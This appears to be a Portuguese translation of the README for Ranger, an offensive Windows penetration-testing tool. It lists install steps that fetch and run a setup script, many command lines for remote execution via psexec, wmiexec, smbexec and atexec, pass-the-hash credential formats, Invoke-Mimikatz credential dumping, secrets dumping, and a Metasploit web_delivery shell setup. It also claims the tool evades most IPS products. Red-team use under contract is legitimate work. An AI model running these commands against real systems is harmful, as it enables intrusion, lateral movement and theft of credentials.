
Uma ferramenta para profissionais de segurança acessarem e interagirem com sistemas remotos baseados em Microsoft Windows.
Uma ferramenta para auxiliar profissionais de segurança a acessar e interagir com sistemas remotos baseados em Microsoft Windows.
Este projeto foi concebido com o pensamento: não inventamos o arco ou a flecha, apenas uma forma mais eficiente de usá-los.
Ranger é uma ferramenta de ataque e teste de penetração orientada por linha de comando, que tem a capacidade de usar um servidor catapulta instanciado para entregar capacidades contra sistemas Windows. Desde que um usuário tenha um conjunto de credenciais ou um conjunto de hashes (NTLM, LM, LM:NTLM), ele pode obter acesso a sistemas que fazem parte da confiança.
Usando essa capacidade, um profissional de segurança pode extrair credenciais da memória em texto claro, acessar tabelas SAM, executar comandos, scripts PowerShell, binários Windows e outras ferramentas. Atualmente, a ferramenta contorna a maioria das soluções de IPS de fornecedores, a menos que tenham sido ajustadas especificamente para detectá-la. A ferramenta foi desenvolvida usando nossos laboratórios caseiros em um esforço para apoiar profissionais de segurança que realizam atividades legais e/ou contratualmente apoiadas.
Mais funcionalidades estão sendo adicionadas, mas no momento a ferramenta usa contribuições da comunidade de repositórios relacionados às equipes PowerShell PowerView, PowerShell Mimikatz e Impacket.
wget https://raw.githubusercontent.com/funkandwagnalls/ranger/master/setup.sh
chmod a+x setup.sh
./setup.sh
rm setup.sh
ranger --update
--scout
--secrets-dump
--wmiexec
--psexec
--smbexec
--atexec
--command
--invoker
--downloader
--executor
--domain-group-members
--local-group-members
--get-domain-membership
--get-forest-domains
--get-forest
--get-dc
--find-la-access
ranger.py [-u Administrator] [-p Password1] [-d Domain] --scout
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --smbexec -q -v -vv -vvv
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -q -v -vv -vvv
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -c "Net User" -q -v -vv -vvv
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec -c "Net User"
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -c -x "im.ps1" -f "Invoke-Mimikatz -DumpCreds"
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --atexec -c "Net User" --no-encoder
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker --no-encoder
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader --no-encoder
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -x "im.ps1" -f "Invoke-Mimikatz -DumpCreds" --no-encoder
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --secrets-dump
ranger.py --invoker -q -v -vv -vvv
ranger.py --downloader -q -v -vv -vvv
ranger.py --executor -q -v -vv -vvv
--get-domain-membership--domain opcional, que permite direcionar um domínio diferente daquele em que você fez login.ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --get-domain-membership
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --domain "Domain.local2"
username password
username LM:NTLM
username :NTLM
username **NO PASSWORD**:NTLM
PWDUMP
username PWDUMP domain
username password domain
username LM:NTLM domain
username :NTLM domain
username **NO PASSWORD**:NTLM domain
PWDUMP domain
username PWDUMP domain
-d, ele inferirá que você deseja ignorar todos os nomes de domínio no arquivo.password
LM:NTLM
:NTLM
PWDUMP
-t 192.168.195.1-100,192.168.195.200-192.168.198.3 -tl list1,list2,lis3 -tnX scan1.xml,scan2.xmlt nos comandos por e.-e 192.168.195.1-100,192.168.195.200-192.168.198.3 -el list1,list2,lis3 -enX scan1.xml,scan2.xml-f.-a.-f e -a se você quiser alterar o comando; para evitar usar -a, você pode usar Executor.-x "im.ps1" -f "Invoke-Mimikatz" -a "DumpCreds"-x.-f.-a se a ferramenta exigir.-x "im.ps1" -f "Invoke-Mimikatz" -a "DumpCreds"-x "im.ps1" -f "Invoke-Mimikatz -DumpCreds"use exploit/multi/script/web_delivery
set targets 2
set payload <escolha o payload desejado>
set lhost <seu IP>
set lport <porta para o shell, certifique-se de que não seja uma porta conflitante>
set URIPATH /
set SRVPORT <a mesma porta definida pela opção -r no ranger, o padrão é 8888>
exploit -j
##FAQ
Estou recebendo erros de acesso negado em máquinas Windows que fazem parte de um WORKGROUP.
Quando não faz parte de um domínio, o Windows por padrão não possui compartilhamentos administrativos. O SMBEXEC depende de compartilhamentos ativados. Além disso, o WMIC não está ativado em máquinas WORKGROUP. O SMBEXEC e o WMIEXEC são feitos para atingir protocolos ativados em sistemas de domínio. Embora seja certamente possível ativar essas funções em um sistema WORKGROUP, observe que você estará introduzindo protocolos vulneráveis (afinal, é para isso que esta ferramenta foi feita). Ativar esses recursos no seu sistema doméstico principal que seu parceiro usa para Facebook provavelmente não é a melhor ideia.
enum4linux e então usar o argumento --share share_name no ranger para tentar executar o SMBEXEC.https://pypi.python.org/pypi/colorama#Agradecimentos:
[BSides Charm City 2016: 23 de abril de 2016] (http://2016.bsidescharm.com/2016-talks/ranger-it-just-takes-one-account-to-take-down-an-enterprise)
[Vídeo] (https://youtu.be/HrXTrPzdR2Q?list=PL0YXeUocWA4NAGPmYdKNmQEh8H6iL_4Ik)
[Black Arch Linux] (https://blackarch.org/)